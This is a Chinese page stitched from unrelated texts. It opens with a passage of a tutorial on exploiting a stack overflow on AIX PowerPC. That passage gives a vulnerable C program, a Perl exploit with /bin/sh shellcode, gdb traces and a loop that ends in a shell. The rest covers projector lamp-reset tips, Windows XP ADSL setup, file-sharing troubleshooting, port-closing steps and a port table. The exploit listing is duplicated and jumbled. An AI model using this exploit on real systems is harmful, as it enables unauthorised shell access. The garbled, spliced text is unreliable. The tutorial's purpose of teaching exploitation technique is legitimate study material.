这几步指令的功能在前面已经说过了,就是main函数在退出的时候会切换到前一个栈帧,并且把r1+8的内容保存到lr寄存器,然后跳到lr寄存器执行。
五、学习如何攻击AIX PowerPC的溢出程序
了解了溢出流程后,我们可以来试试如何写攻击程序:
bash-2.04$ cat vulnerable.c
/* vulnerable.c
*
* Vulnerable program on the PowerPC architecture.
*/
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[])
{
char vulnbuff[16];
strcpy (vulnbuff, argv[1]);
printf ("\n%s\n", vulnbuff);
getchar(); /* for debug */
}
bash-2.04$ gcc -o vulnerable vulnerable.c
AIX和其它架构的操作系统一样,也有USER_UPPER(栈底),它的地址是0x2ff22fff,大致的堆栈结构如下:
栈底
+----------------+ 0x2ff22fff
| 保留 |
+----------------+
| 环境变量 |
+----------------+
| 执行文件参数 |
+----------------+
|执行文件绝对路径|
+----------------+
| 栈帧 |
SP --->+----------------+
| 堆栈增长方向 |
. | .
. v .
虽然不确认保留字段的长度,但是我们能够比较准确的猜测环境变量的地址,参考前面的调试流程和watercloud的一些AIX攻击程序,想当然的写一个攻击程序:
bash-2.04$ cat exploit.pl
#!/usr/bin/perl
#
# exploit.pl
# exploit program vulnerable
$CMD="/home/san/vulnerable";
$SHELLCODE=
"\x7c\xa5\x2a\x79". # /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd". # /* bnel <shellcode> */
"\x7f\xe8\x02\xa6". # /* mflr r31 */
"\x3b\xff\x01\x20". # /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08". # /* cal r3,-248(r31) */
"\x38\x9f\xff\x10". # /* cal r4,-240(r31) */
"\x90\x7f\xff\x10". # /* st r3,-240(r31) */
"\x90\xbf\xff\x14". # /* st r5,-236(r31) */
"\x88\x5f\xff\x0f". # /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f". # /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42". # /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02". # /* svca */
"/bin/sh".
"\x03";
$NOP="\x60\x60\x60\x60"x800;
%ENV=();
$ENV{CCC}=$NOP.$SHELLCODE;
$ret=system $CMD ,"\x2f\xf2\x2b\x40"x9;
调试一下:
bash-2.04$ ./exploit.pl
/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@
在另一个终端用gdb调试vulnerable:
bash-2.04$ ps aux|grep vul
san 259226 0.0 0.0 208 244 pts/1 A 21:02:58 0:00 grep vul
san 13018 0.0 0.0 64 120 pts/0 A 21:00:10 0:00 /home/san/vulner
bash-2.04$ gdb vulnerable 13018
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "powerpc-ibm-aix4.3.2.0"...
/home/san/13018: No such file or directory.
Attaching to program: /home/san/vulnerable, process 13018
0xd01762f0 in read ()
(gdb) disas main
Dump of assembler code for function main:
0x10000308 <main>: mflr r0
0x1000030c <main+4>: stw r31,-4(r1)
0x10000310 <main+8>: stw r0,8(r1)
0x10000314 <main+12>: stwu r1,-80(r1)
0x10000318 <main+16>: mr r31,r1
0x1000031c <main+20>: stw r3,104(r31)
0x10000320 <main+24>: stw r4,108(r31)
0x10000324 <main+28>: bl 0x10000530 <__main>
0x10000328 <main+32>: crmove 4*cr7+so,4*cr7+so
0x1000032c <main+36>: lwz r11,108(r31)
0x10000330 <main+40>: addi r9,r11,4
0x10000334 <main+44>: addi r3,r31,56
0x10000338 <main+48>: lwz r4,0(r9)
0x1000033c <main+52>: bl 0x100005a0 <text+28>
0x10000340 <main+56>: crmove 4*cr7+so,4*cr7+so
0x10000344 <main+60>: lwz r3,40(r2)
0x10000348 <main+64>: addi r4,r31,56
0x1000034c <main+68>: bl 0x100006b4 <printf>
0x10000350 <main+72>: lwz r2,20(r1)
0x10000354 <main+76>: lwz r0,44(r2)
0x10000358 <main+80>: lwz r9,44(r2)
0x1000035c <main+84>: lwz r11,44(r2)
0x10000360 <main+88>: lwz r10,4(r11)
0x10000364 <main+92>: addi r0,r10,-1
0x10000368 <main+96>: mr r11,r0
0x1000036c <main+100>: stw r11,4(r9)
0x10000370 <main+104>: cmpwi r11,0
0x10000374 <main+108>: bge 0x10000388 <main+128>
0x10000378 <main+112>: lwz r3,44(r2)
0x1000037c <main+116>: bl 0x10000720 <__filbuf>
0x10000380 <main+120>: lwz r2,20(r1)
0x10000384 <main+124>: b 0x10000398 <main+144>
0x10000388 <main+128>: lwz r9,44(r2)
0x1000038c <main+132>: lwz r11,0(r9)
0x10000390 <main+136>: addi r11,r11,1
0x10000394 <main+140>: stw r11,0(r9)
0x10000398 <main+144>: lwz r1,0(r1)
0x1000039c <main+148>: lwz r0,8(r1)
0x100003a0 <main+152>: mtlr r0
0x100003a4 <main+156>: lwz r31,-4(r1)
0x100003a8 <main+160>: blr
0x100003ac <main+164>: .long 0x0
---Type <return> to continue, or q <return> to quit---
0x100003b0 <main+168>: .long 0x2061
0x100003b4 <main+172>: lwz r0,513(r1)
0x100003b8 <main+176>: .long 0x0
0x100003bc <main+180>: .long 0xa4
0x100003c0 <main+184>: .long 0x46d61
0x100003c4 <main+188>: xori r14,r11,7936
End of assembler dump.
(gdb) b *0x100003a8
Breakpoint 1 at 0x100003a8
(gdb) c
Continuing.
在执行exploit.pl的窗口随便敲个键,gdb调试窗口就可以继续了:
Breakpoint 1, 0x100003a8 in main ()
(gdb) i reg
r0 0x2ff22b40 804399936
r1 0x2ff22210 804397584
r2 0x20000838 536873016
r3 0xa 10
r4 0xf005f470 -268045200
r5 0xf005f471 -268045199
r6 0xd030 53296
r7 0x0 0
r8 0x60000000 1610612736
r9 0x6000695b 1610639707
r10 0x0 0
r11 0x6000322f 1610625583
r12 0x10000380 268436352
r13 0xdeadbeef -559038737
r14 0x2 2
r15 0x2ff22264 804397668
r16 0x2ff22270 804397680
r17 0x0 0
r18 0xdeadbeef -559038737
r19 0xdeadbeef -559038737
r20 0xdeadbeef -559038737
r21 0xdeadbeef -559038737
r22 0xdeadbeef -559038737
r23 0xdeadbeef -559038737
r24 0xdeadbeef -559038737
r25 0xdeadbeef -559038737
r26 0xdeadbeef -559038737
r27 0xdeadbeef -559038737
r28 0xdeadbeef -559038737
r29 0xdeadbeef -559038737
r30 0xdeadbeef -559038737
r31 0x2ff22b40 804399936
pc 0x100003a8 268436392
ps 0x2d030 184368
cr 0x24222422 606217250
lr 0x2ff22b40 804399936
ctr 0x0 0
xer 0x0 0
(gdb) x/20x $r1
0x2ff22210: 0x2ff22b40 0x2ff22b40 0x2ff22b40 0x00000000
0x2ff22220: 0x00000000 0x00000000 0x00000002 0x2ff22264
0x2ff22230: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22240: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22250: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) x/20x 0x2ff22b40
0x2ff22b40: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b50: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b60: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b70: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22b80: 0x60606060 0x60606060 0x60606060 0x60606060
...
...
...
(gdb)
0x2ff22f00: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f10: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f20: 0x60606060 0x60606060 0x60606060 0x60606060
0x2ff22f30: 0x60606060 0x60607ca5 0x2a794082 0xfffd7fe8
0x2ff22f40: 0x02a63bff 0x0120387f 0xff08389f 0xff10907f
我们看到lr寄存器正好被覆盖为0x2ff22b40,这就说明程序的流程能达到0x2ff22b40,这个地址也都是填充的nop指令,由于AIX PowerPC是4字节的等长指令,注意到0x2ff22f34这个地址错了两个字节,这肯定导致shellcode无法正常执行。watercloud有一个很好的方法解决这个指令字节对齐的问题,用嵌套循环遍历保证字节对齐:
#!/usr/bin/perl
#
# exploit.pl
# exploit program vulnerable
$CMD="/home/san/vulnerable";
$SHELLCODE=
"\x7c\xa5\x2a\x79". # /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd". # /* bnel <shellcode> */
"\x7f\xe8\x02\xa6". # /* mflr r31 */
"\x3b\xff\x01\x20". # /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08". # /* cal r3,-248(r31) */
"\x38\x9f\xff\x10". # /* cal r4,-240(r31) */
"\x90\x7f\xff\x10". # /* st r3,-240(r31) */
"\x90\xbf\xff\x14". # /* st r5,-236(r31) */
%ENV=();
$ENV{CCC}=$NOP.$SHELLCODE;
$ret=system $CMD ,"\x2f\xf2\x2b\x40"x9;
for($i=0;$i<4 && $ret;$i++){
for($j=0;$j<4 && $ret;$j++) {
$ENV{CCC}="A"x $j .$NOP.$SHELLCODE;
%ENV=();
$ENV{CCC}=$NOP.$SHELLCODE;
$ret=system $CMD ,"\x2f\xf2\x2b\x40"x9;
for($i=0;$i<4 && $ret;$i++){
for($j=0;$j<4 && $ret;$j++) {
$ENV{CCC}="A"x $j .$NOP.$SHELLCODE;
$ret = system $CMD ,"A"x $i ."\x2f\xf2\x2b\x40"x9;
}
}
bash-2.04$ ./exploit.pl
/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@
/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@
/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@
/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@
$
好了,至此大家是否对AIX PowerPC的构架与其溢出技术有一些理解了?由于初次接触AIX PowerPC的东西,如有错误敬请指正,如有问题一起探讨。
参考
1、 UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes
http://lsd-pl.net/unix_assembly.html
2、 PowerPC / OS X (Darwin) Shellcode Assembly - B-r00t
3、 Assembler Language Reference
http://publib16.boulder.ibm.com/pseries/en_US/aixassem/alangref/alangreftfrm.htm
4、 PowerPC Microprocessor Family: The Programming Environments for 32-Bit Microprocessors
http://www-3.ibm.com/chips/techlib/techlib.nsf/techdocs/852569B20050FF778525699600719DF2/$file/6xx_pem.pdf
5、 OPTIMIZING PowerPC CODE - Gary Kacmarcik
6、 PowerPC 汇编
http://www-900.ibm.com/developerWorks/cn/linux/hardware/ppc/assembly/index.shtml
7、 PowerPC 体系结构开发者指南
http://www-900.ibm.com/developerWorks/cn/linux/l-powarch/index.shtml
8、 [Tips]AIX (PPC)上写exploite 1。
https://www.xfocus.net/bbs/index.php?act=ST&f=19&t=28177
9、 http://aixpdslib.seas.ucla.edu/
10、 64-bit PowerPC ELF Application Binary Interface Supplement 1.7
http://www.linuxbase.org/spec/ELF/ppc64/spec/book1.html
11、Mach-O Runtime Conventions for PowerPC
http://developer.apple.com/documentation/DeveloperTools/Conceptual/MachORuntime/2rt_powerpc_abi/chapter_9_section_1.html
12、Programmer's Introduction to PowerPC
http://physinfo-mac0.ulb.ac.be/divers_html/PowerPC_Programming_Info/intro_to_ppc/ppc0_index.html Panasonic (松下) 投影机的清零方法 先按“MENU”找到灯泡使用时间,再按“ENTER”三秒,出现“POWER OFF”后,关掉电源重新启动OK ! Hitachi(日立) 投影机清零方法 开机中,按RESET健3秒,出现时间对话,选择0就OK了 SONY (索尼) 投影机清零方法 RESES+左+右+确定(适用索尼大部分机型) NEC(日电) 投影机清零方法 830/840/850/440等系列时间到的话会出现二个指示灯亮,包括LAMP指示灯,清零方法是待机下按遥控器OFF健20秒左右,在遥控器底部有一个耳机插口,如果有线的话可连接到投影机的遥控器输入口,这样清零会方便一点; 3M 投影机清零方法 在开机下,按RESET健3秒,会出现一个时间有对话,选择0就好了! Mitsubishi (三菱) 投影机清零方法 在待机下按左+右+电源 Epson (爱普生) 投影机清零方法 只适用灯架处有电阻的机器:在灯架处有一个小电阻(清零用的),只要把机器中相对应的4个小针短路一下就行了,这个会烦一点,且短路弄不好还会可能烧主板;
Toshiba(东芝) 投影机清零方法 在不接电源下按电源+菜单+确定+输入,按住不放接电源3秒钟,适用780以前所有的机器; Philips(飞利浦) 投影机清零方法 开机中,菜单中选择灯泡时间栏,按投影机上的OK键3秒 SANYO(三洋)、EIKI(爱其)、Canon(佳能)投影机清零方法 全部在菜单中,有LAMP字样这栏,全部是YES; PLUS(普乐士) 投影机清零方法 适用机型:PLUS U2-811/U2-815/U2-815C/U2-1110/U2-1130/U2-X1130C/U2-1150.在1100个小时内清零:菜单选到时间上、按遥控器上ON(8秒钟左右);使用1100小时后,无法开机状态下,直接按遥控器上ON(25秒左右)。 适用机型:PLUS U3-810SFC/U3-1080SFC/U3-810WZC/U3-1080WZC/U2-X200UC/4-161/U4-121/V-1080C/V-807C/V-1100C/U2-850/U2-1500/U2-850W/U2-1500W/U5-121/U5-162.菜单里灯泡定时器清零 INFOCUS(富可视)、ASK(美投神) 、Proxima(宝施玛)、IBM投影机清零方法 一般的是在菜单里清.富可视500/530 在开机下,按菜单+音量减3秒钟,后打开菜单看看有没有清,如没有可以多试几次;IBM是INFOCUS代工的,参考INFOCUS SHARP(夏普) 投影机清零方法 夏普视频机(PN200/300/500/C10等)灯泡时间清零,待机下按住“音量 减”+“选择 下”,后开机;夏普100S/00X/200/220等,投影机灯泡清零方法,待机下按住—、+、AUTOSYNC三个键,后开机; 注意:SHARP后面出来的机器(2004年新款)不要随意清零,清了零的话就要更换灯泡,不然这个灯在200小时左右就会报废了。 1. ‘开始’菜单,选择‘控制面板’;再双击‘网络连接’: 
或右击‘网上邻居’,选择属性: 
2. 在‘网络连接’窗口中选择‘创建一个新的连接’: 
3. 在弹出窗口中,按如下图示连续选择‘下一步’: 
4. 选择‘手动设置我的连接’: 
5. 选择‘用要求用户名和密码的宽带连接来连接’: 
6. 输入此连接的名字(任意),如’ADSL’等,连接按‘下一步’: 
7. 输入在当地ADSL申请时的用户名及密码即可,此步如若不对,请打电话到申请ADSL的单位进行查询和恢复: 
8. 选择创建‘桌面快捷方式’,即可大功告成: 
 此为桌面的‘ADSL连接’的快捷方式
 此为控制面板中增加的‘ADSL连接’
 此为ADSL连接连接的拨号窗口,输入正确的用户名及密码后即可选择连接。
2008-10-13 JohnWu 无论是系统管理员还是普通电脑用户,常常都会对共享产生诸多疑惑,本来十分简单的共享服务,为何常常引出麻烦?为了尽量不卖弄技术,把过程说得简单一些,特整理 检测排除步骤如下(注意以下命令及过程受用户权限控制): -
检测网卡状态中的"文件和打印机共享"服务是否安装或选中; 
-
检测防火墙(包括第三方防火墙),关闭或让共享例外; - 以下三图均可实现
运行services.msc 
控制面板 'Windows防火墙'  
-
检测WINDOWS服务,SERVER是否启动,运行service.msc,如下图。{net start server,sc config "lanmanserver" start=auto},否则可能右键无'共享'选项; 
-
检测组策略:gpedit.msc - 共享方式:经典;此举同'文件夹选项'取消'使用简单文件共享(推荐)';
此举决定是否能以GUEST外的其他帐户验证访问, - 若是'仅来宾'的简单共享模式,需要启用来宾帐户(net user guest /active:yes),确保GUEST无红叉。运行lusrmgr.msc如下图;
- 同时需要将 "拒绝从网络访问这台计算机"中的Guest删除(右键属性),运行gpedit.msc如下图。
- 若组策略'禁止空密码网络访问',刚需要检测管理员帐户及来宾帐户密码是否为空,可使用命令修改net user guest "password",也可以修改组策略禁用空密码通过网络访问。若是'经典'共享模式,需要考虑管理员用户名及密码。及权衡共享安全配置。
-
设置共享文件夹的属性为共享权限及本地安全性: - 共享权限及权利容易设置
-
如果是NTFS分区中的内容,可能需要设置文件夹的本地安全性,否则,共享权限受制于本地安全性而无法正常访问(来宾共享模式下无安全性设置,需要使用命令cacls dirpath /e /t /c /g username:f ): 
总结
不能访问主要是由于XP默认不开启guest,而且即使开了guest,XP默认是不允许guest从网络访问计算机的,另外限制对空密码的用户的网络访问。当然N台计算机要在相同的工作组里。还有就是那个值得注意的问题。相信一些不考虑安全的地方或是电脑公司给人做系统密码都是空的,但这样是不允许登录的。只要试过以上的方法,相信是不会再有问题的。如果有,那就要考虑网卡驱动,系统服务,防火墙是否正常工作的深层原因了,不在讨论之列。 附:共享相关知识 可能经常不能在网络邻居中看到你要访问的计算机,除非你知道计算机的名字或者IP地址,通过搜索或者直接输入//computername或//IP。请按下面的操作解决:启动"计算机浏览器"服务。"计算机浏览器服务"在网络上维护一个计算机更新列表,并将此列表提供给指定为浏览器的计算机。如果停止了此服务,则既不更新也不维护该列表。 137/UDP--NetBIOS名称服务器,网络基本输入/输出系统(NetBIOS)名称服务器(NBNS)协议是TCP/IP上的NetBIOS(NetBT)协议族的一部分,它在基于NetBIOS名称访问的网络上提供主机名和地址映射方法。 138/UDP--NetBIOS数据报,NetBIOS数据报是TCP/IP上的NetBIOS(NetBT)协议族的一部分,它用于网络登录和浏览。 139/TCP--NetBIOS会话服务,NetBIOS会话服务是TCP/IP上的NetBIOS(NetBT)协议族的一部分,它用于服务器消息块(SMB)、文件共享和打印。请设置防火墙开启相应的端口。一般只要在防火墙中允许文件夹和打印机共享服务就可以了。 445/TCP,该端口在Windows 2000 Server或Windows Server 2003系统中发挥的作用与139端口是完全相同的。具体地说,它也是提供局域网中文件或打印机共享服务。不过该端口是基于CIFS协议(通用因特网文件系统协议)工作的,而139端口是基于SMB协议(服务器协议族)对外提供共享服务。同样地,攻击者与445端口建立请求连接,也能获得指定局域网内的各种共享信息。 关闭135 1、运行 输入"dcomcnfg"
2、在"计算机"选项右边,右键单击"我的电脑",选择"属性"。
3、在出现的"我的电脑属性"对话框"默认属性"选项卡中,去掉"在此计算机上启用分布式COM"前的勾。
4、选择"默认协议"选项卡,选中"面向连接的TCP/IP",单击"删除"按钮
关闭136137138端口
在网络邻居上点右键选属性,在新建好的连接上点右键选属性再选择网络选项卡,去掉Microsoft网络的文件和打印机共享,和Microsoft网络客户端的复选框。这样就关闭了共享端137和138还有136端口
关闭139端口:139端口是NetBIOS Session端口,用来文件和打印共享,注意的是运行samba的unix机器也开放了139端口,功能一样。关闭139口听方法是在"网络和拨号连接"中"本地连接"中选取"Internet协议(TCP/IP)"属性,进入"高级TCP/IP设置""WINS设置"里面有一项"禁用TCP/IP的 NETBIOS",打勾就关闭了139端口
关闭445端口:开始-运行输入regedit.确定后定位到
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servi ces\NetBT\Parameters,新建名为"SMBDeviceEnabled"的DWORD值,并将其设置为0 在WinXP和Win2000中浏览网上邻居时系统默认会延迟30秒,Windows将使用这段时间去搜寻远程计算机是否有指定的计划任务(甚至有可能到Internet中搜寻)。如果搜寻时网络时没有反应便会陷入无限制的等待,那么10多分钟的延迟甚至报错就不足为奇了。下面是具体的解决方法。 A.关掉WinXP的计划任务服务(Task Scheduler) 可以到"控制面板/管理工具/服务"中打开"Task Scheduler"的属性对话框,单击"停止"按钮停止该项服务,再将启动类型设为"手动",这样下次启动时便不会自动启动该项服务了。 B.删除注册表中的两个子键 到注册表中找到主键"HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerRemoteComputerNameSpace" 删除下面的两个子健:和。 其中,第一个子健决定网上邻居是否要搜索网上的打印机(甚至要到Internet中去搜寻),如果网络中没有共享的打印机便可删除此键。第二个子健则决定是否需要查找指定的计划任务,这是网上邻居很慢的罪魁祸首,必须将此子健删除。 另外,以下命令可实现对当前系统共享信息的备份: REG EXPORT HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\LANMANSERVER\SHARES D:\REGBKUP.REG /Y 
端口 协议 应用程序协议 系统服务名称
n/a GRE GRE(IP 协议 47) 路由和远程访问
n/a ESP IPSec ESP(IP 协议 50) 路由和远程访问
n/a AH IPSec AH(IP 协议 51) 路由和远程访问
7 TCP Echo 简单 TCP/IP 服务
7 UDP Echo 简单 TCP/IP 服务
9 TCP Discard 简单 TCP/IP 服务
9 UDP Discard 简单 TCP/IP 服务
13 TCP Daytime 简单 TCP/IP 服务
13 UDP Daytime 简单 TCP/IP 服务
17 TCP Quotd 简单 TCP/IP 服务
17 UDP Quotd 简单 TCP/IP 服务
19 TCP Chargen 简单 TCP/IP 服务
19 UDP Chargen 简单 TCP/IP 服务
20 TCP FTP 默认数据 FTP 发布服务
21 TCP FTP 控制 FTP 发布服务
21 TCP FTP 控制 应用程序层网关服务
23 TCP Telnet Telnet
25 TCP SMTP 简单邮件传输协议
25 UDP SMTP 简单邮件传输协议
25 TCP SMTP Exchange Server
25 UDP SMTP Exchange Server
42 TCP WINS 复制 Windows Internet 名称服务
42 UDP WINS 复制 Windows Internet 名称服务
53 TCP DNS DNS Server
53 UDP DNS DNS Server
53 TCP DNS Windows 防火墙/Internet 连接共享
53 UDP DNS Windows 防火墙/Internet 连接共享
67 UDP DHCP 服务器 DHCP 服务器
67 UDP DHCP 服务器 Windows 防火墙/Internet 连接共享
69 UDP TFTP 普通 FTP 后台程序服务
80 TCP HTTP Windows 媒体服务
80 TCP HTTP 万维网发布服务
80 TCP HTTP SharePoint Portal Server
88 TCP Kerberos Kerberos 密钥分发中心
88 UDP Kerberos Kerberos 密钥分发中心
102 TCP X.400 Microsoft Exchange MTA 堆栈
110 TCP POP3 Microsoft POP3 服务
110 TCP POP3 Exchange Server
119 TCP NNTP 网络新闻传输协议
123 UDP NTP Windows 时间
123 UDP SNTP Windows 时间
135 TCP RPC 消息队列
135 TCP RPC 远程过程调用
135 TCP RPC Exchange Server
135 TCP RPC 证书服务
135 TCP RPC 群集服务
135 TCP RPC 分布式文件系统
135 TCP RPC 分布式链接跟踪
135 TCP RPC 分布式事务处理协调器
135 TCP RPC 事件日志
135 TCP RPC 传真服务
135 TCP RPC 文件复制
135 TCP RPC 本地安全机构
135 TCP RPC 远程存储通知
135 TCP RPC 远程存储服务器
135 TCP RPC Systems Management Server 2.0
135 TCP RPC 终端服务授权
135 TCP RPC 终端服务会话目录
137 UDP NetBIOS 名称解析 计算机浏览器
137 UDP NetBIOS 名称解析 服务器
137 UDP NetBIOS 名称解析 Windows Internet 名称服务
137 UDP NetBIOS 名称解析 Net Logon
137 UDP NetBIOS 名称解析 Systems Management Server 2.0
138 UDP NetBIOS 数据报服务 计算机浏览器
138 UDP NetBIOS 数据报服务 Messenger
138 UDP NetBIOS 数据报服务 服务器
138 UDP NetBIOS 数据报服务 Net Logon
138 UDP NetBIOS 数据报服务 分布式文件系统
138 UDP NetBIOS 数据报服务 Systems Management Server 2.0
138 UDP NetBIOS 数据报服务 许可证记录服务
139 TCP NetBIOS 会话服务 计算机浏览器
139 TCP NetBIOS 会话服务 传真服务
139 TCP NetBIOS 会话服务 性能日志和警报
139 TCP NetBIOS 会话服务 后台打印程序
139 TCP NetBIOS 会话服务 服务器
139 TCP NetBIOS 会话服务 Net Logon
139 TCP NetBIOS 会话服务 远程过程调用定位器
139 TCP NetBIOS 会话服务 分布式文件系统
139 TCP NetBIOS 会话服务 Systems Management Server 2.0
139 TCP NetBIOS 会话服务 许可证记录服务
143 TCP IMAP Exchange Server
161 UDP SNMP SNMP 服务
162 UDP SNMP 陷阱出站 SNMP 陷阱服务
389 TCP LDAP 服务器 本地安全机构
389 UDP LDAP 服务器 本地安全机构
389 TCP LDAP 服务器 分布式文件系统
389 UDP LDAP 服务器 分布式文件系统
443 TCP HTTPS HTTP SSL
443 TCP HTTPS 万维网发布服务
443 TCP HTTPS SharePoint Portal Server
445 TCP SMB 传真服务
445 TCP SMB 后台打印程序
445 TCP SMB 服务器
445 TCP SMB 远程过程调用定位器
445 TCP SMB 分布式文件系统
445 TCP SMB 许可证记录服务
445 TCP SMB Net Logon
500 UDP IPSec ISAKMP 本地安全机构
515 TCP LPD TCP/IP 打印服务器
548 TCP Macintosh 文件服务器 Macintosh 文件服务器
554 TCP RTSP Windows 媒体服务
563 TCP NNTP over SSL 网络新闻传输协议
593 TCP HTTP 上的 RPC 远程过程调用
593 TCP HTTP 上的 RPC Exchange Server
636 TCP LDAP SSL 本地安全机构
636 UDP LDAP SSL 本地安全机构
993 TCP SSL 上的 IMAP Exchange Server
995 TCP SSL 上的 POP3 Exchange Server
1270 TCP MOM-Encrypted Microsoft Operations Manager 2000
1433 TCP TCP 上的 SQL Microsoft SQL Server
1433 TCP TCP 上的 SQL MSSQL$UDDI
1434 UDP SQL Probe Microsoft SQL Server
1434 UDP SQL Probe MSSQL$UDDI
1645 UDP 旧式 RADIUS Internet 身份验证服务
1646 UDP 旧式 RADIUS Internet 身份验证服务
1701 UDP L2TP 路由和远程访问
1723 TCP PPTP 路由和远程访问
1755 TCP MMS Windows 媒体服务
1755 UDP MMS Windows 媒体服务
1801 TCP MSMQ 消息队列
1801 UDP MSMQ 消息队列
1812 UDP RADIUS 身份验证 Internet 身份验证服务
1813 UDP RADIUS 计帐 Internet 身份验证服务
1900 UDP SSDP SSDP 发现服务
2101 TCP MSMQ-DCs 消息队列
2103 TCP MSMQ-RPC 消息队列
2105 TCP MSMQ-RPC 消息队列
2107 TCP MSMQ-Mgmt 消息队列
2393 TCP OLAP Services 7.0 SQL Server:下层 OLAP 客户端支持
2394 TCP OLAP Services 7.0 SQL Server:下层 OLAP 客户端支持
2460 UDP MS Theater Windows 媒体服务
2535 UDP MADCAP DHCP 服务器
2701 TCP SMS 远程控制(控件) SMS 远程控制代理
2701 UDP SMS 远程控制(控件) SMS 远程控制代理
2702 TCP SMS 远程控制(数据) SMS 远程控制代理
2702 UDP SMS 远程控制(数据) SMS 远程控制代理
2703 TCP SMS 远程聊天 SMS 远程控制代理
2703 UPD SMS 远程聊天 SMS 远程控制代理
2704 TCP SMS 远程文件传输 SMS 远程控制代理
2704 UDP SMS 远程文件传输 SMS 远程控制代理
2725 TCP SQL 分析服务 SQL 分析服务器
2869 TCP UPNP 通用即插即用设备主机
2869 TCP SSDP 事件通知 SSDP 发现服务
3268 TCP 全局编录服务器 本地安全机构
3269 TCP 全局编录服务器 本地安全机构
3343 UDP 群集服务 群集服务
3389 TCP 终端服务 NetMeeting 远程桌面共享
3389 TCP 终端服务 终端服务
3527 UDP MSMQ-Ping 消息队列
4011 UDP BINL 远程安装
4500 UDP NAT-T 本地安全机构
5000 TCP SSDP 旧事件通知 SSDP 发现服务
5004 UDP RTP Windows 媒体服务
5005 UDP RTCP Windows 媒体服务
42424 TCP ASP.Net 会话状态 ASP.NET 状态服务
51515 TCP MOM-Clear Microsoft Operations Manager 2000 下表列出了本文所包含的信息的概述: 本文的“系统服务端口”部分包含对每个服务的简短说明,显示该服务的逻辑名称,并指出每个服务进行正确操作所需的端口和协议。使用此部分可帮助识别特定的服务所使用的端口和协议。
本文的“端口与协议”部分中包括一个表,其中总结了“系统服务端口”部分中的信息。这个表是按端口号排序的,而不是按服务名称排序的。使用此部分可以迅速确定哪些服务侦听特定的端口。
本文在某些术语的使用上采用了特定的方式。为了避免混淆,请确保对本文使用这些术语的方式有所了解。下表对这些术语进行了说明:
系统服务:Windows 服务器系统包括许多产品,如 Microsoft Windows Server 2003 系列、Microsoft Exchange 2000 Server 和 Microsoft SQL Server 2000。所有这些产品都包括许多组件,系统服务就是这些组件之一。特定计算机所需的系统服务或者由操作系统在启动期间自动启动,或者根据需要在典型操作期间启动。例如,在运行 Windows Server 2003 企业版的计算机上,一些可用的系统服务包括服务器服务、后台打印程序服务以及万维网发布服务。每个系统服务都有一个好记的服务名称和一个服务名称。好记的服务名称是图形管理工具(如“服务”Microsoft 管理控制台 (MMC) 管理单元)中出现的名称。服务名称是用于命令行工具以及许多脚本语言的名称。每个系统服务可以提供一项或多项网络服务。
应用程序协议:在本文中,应用程序协议是指使用一个或多个 TCP/IP 协议和端口的高级网络协议。应用程序协议的实例包括超文本传输协议 (HTTP)、服务器消息块 (SMB) 和简单邮件传输协议 (SMTP)。
协议:TCP/IP 协议在低于应用程序协议的级别上运行,它是网络上的设备之间进行通信的标准格式。TCP/IP 协议套件包括 TCP、用户数据报协议 (UDP) 以及 Internet 控制消息协议 (ICMP)。
端口:这是系统服务侦听传入的网络通信的网络端口。
本文没有指定哪些服务依赖于其他服务进行网络通信。例如,许多服务依赖 Microsoft Windows 中的远程过程调用 (RPC) 功能或 DCOM 功能为它们分配动态 TCP 端口。远程过程调用服务通过其他使用 RPC 或 DCOM 与客户计算机通信的系统服务来协调请求。许多其他服务依赖于网络基本输入/输出系统 (NetBIOS)、SMB、协议(实际上是由服务器服务提供的)。其他服务依赖于 HTTP 或安全超文本传输协议 (HTTPS)。这些协议是由 Internet 信息服务 (IIS) 提供的。有关 Windows 操作系统基础结构的完整讨论已超出本文讨论的范围。不过,在 Microsoft TechNet 和 Microsoft Developer Network (MSDN) 上可以获得有关此主题的详细文档。虽然许多服务可能都依赖于某个特定的 TCP 端口或 UDP 端口,但仅有一个服务或进程可以随时主动侦听此端口。
将 RPC 与 TCP/IP 或 UDP/IP 一起用于传输时,入站端口常常按照需要动态分配给系统服务;使用高于端口 1024 的 TCP/IP 端口和 UDP/IP 端口。这些端口常常被非正式地称为“随机 RPC 端口”。在这些情况下,RPC 客户端依赖 RPC 终结点映射器通知它们哪个(些)动态端口分配给了服务器。对于某些基于 RPC 的服务,您可以配置一个特定的端口而不是让 RPC 动态分配端口。另外,无论对于什么服务,都可以将 RPC 动态分配的端口范围限制为一个小范围。有关此主题的更多信息,请参见本文的“参考”部分。
本文包含有关本文结尾的“适用于”部分中所列出的 Microsoft 产品的系统服务角色和服务器角色的信息。虽然此信息可能同样适用于 Microsoft Windows XP 和 Microsoft Windows 2000 Professional,但本文主要集中讨论服务器类操作系统。因此,本文介绍了服务侦听的端口,而没有介绍客户端程序用来连接到远程系统的端口。
返回页首
系统服务端口
